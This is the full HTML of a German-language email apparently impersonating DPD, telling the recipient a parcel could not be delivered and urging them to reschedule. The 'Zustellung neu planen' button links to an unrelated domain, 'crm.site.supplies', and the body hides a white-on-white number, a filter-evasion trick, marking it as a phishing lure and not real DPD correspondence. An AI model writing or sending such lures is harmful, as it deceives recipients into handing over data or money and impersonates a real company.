<!DOCTYPE html>
<html lang="de">
<head>
  <meta charset="UTF-8">
  <title>DPD Zustellbenachrichtigung</title>
</head>
<body style="font-family: Arial, sans-serif; color: #333333; background-color: #f4f4f4; padding: 20px;">
  <div style="max-width: 600px; margin: auto; background-color: #ffffff; padding: 30px; border: 1px solid #dddddd; border-radius: 8px;">
    <p style="font-size: 16px;">Lieber Kunde,</p>

    <p style="font-size: 16px;">
      leider war es uns heute nicht möglich, Ihre Sendung erfolgreich zuzustellen.
    </p>

    <p style="font-size: 16px;">
      <strong>Bitte bestätigen Sie die nächsten Schritte, um eine erneute Zustellung zu veranlassen.</strong> <span style="color: #ffffff;">7840</span>
    </p>

    <p style="font-size: 16px; margin-top: 20px;">
      <strong>Datum:</strong> 29.09.2025<br>
      <strong>Referenznummer:</strong> [REF.39560068]
    </p>

    <p style="margin: 30px 0;">
      <a href="http://crm.site.supplies/xch01.html" style="display: inline-block; padding: 12px 20px; background-color: #d71920; color: #ffffff; text-decoration: none; border-radius: 5px; font-weight: bold;">
        Zustellung neu planen
      </a>
    </p>

    <p style="font-size: 16px;">
      <strong>Sendungsnummer:</strong> CH13680346
    </p>

    <p style="font-size: 16px; margin-top: 30px;">
      Mit freundlichen Grüßen,<br>
      <strong>Ihr DPD Kundenservice</strong>
    </p>
  </div>
</body>
</html>